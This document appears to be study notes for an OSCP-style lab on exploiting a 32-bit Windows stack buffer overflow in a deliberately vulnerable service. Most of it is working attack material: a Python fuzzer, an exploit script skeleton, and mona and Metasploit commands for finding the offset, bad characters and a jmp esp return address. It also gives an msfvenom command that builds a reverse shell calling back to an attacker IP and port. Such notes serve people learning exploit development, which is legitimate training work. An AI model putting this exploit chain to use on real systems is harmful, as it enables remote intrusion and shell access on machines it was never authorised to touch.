Stack-Based 32-bits

For that task we are going to use a Windows 7 x64 with Immunity Debugger and mona.py installed.

Mona configuration

!mona config -set workingfolder c:\mona\%p

Fuzz to find the vulnerable input

fuzzer.py

import socket, time, sys

ip = "10.10.95.202"
port = 1337
timeout = 5

buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

Crash Replication & Crontrolling EIP

exploit.py

import socket

ip = "10.10.95.202"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

create a pattern: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

And add the output to a payload variable and exploited.

take notes about the EIP and search the offset:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q EIP

Check adding BBBB value to retn variable.

Finding Bad Characters

Find the characters that are not accepted on the payload. (REMEMBER FILL THE EIP)

!mona bytearray -b "\x00"

And add the output to the payload variable (without the offset)

Finally compare the binary file with the stack frame specifying the ESP.

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>

Repeat the process adding the new bad characters found until the results status returns UNMODIFIED

!mona bytearray -b "\x00\x07\x2e\xa0"

Note: If the ESP direction does not match with the beginning of the payload fill it with NOPS (normally is "\x90"\*8)

Finding a Jump Point

Find all “jmp esp” on the system !mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

Remember: Don’t Forget to put the BAD CHARS founded.

Log data, item 11
 Address=625011AF
 Message=  0x625011af : jmp esp |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\oscp\essfunc.dll)

REMBEMBER LITTLE ENDIAN \x62\x50\x11\xAF (system) -> \xAF\x11\x50\x62 (exploit)

Put the adress on the “retn” variable. If the EIP is the same as ESP you success at jummping to ESP.

Generate the Payload

We will generate the payload with msfvenom.

Note: Don’t forget to put the previously found bad chars!

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.11.21.203 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f py

| sed 's/buf/payload/g'

Hint: Using EXITFUNC=thread will only finish the thread once termintad the reverse shell without affecting the whole program. -> NO DoS

Copy the generated payload ant integrate it into the exploit.py

Prepend NOPs

We will need some space in memory for the payload to unpack itself, if we added a padding before to match the beginning of the payload with ESP add another 16 NOPS.

padding = "\x90" * 16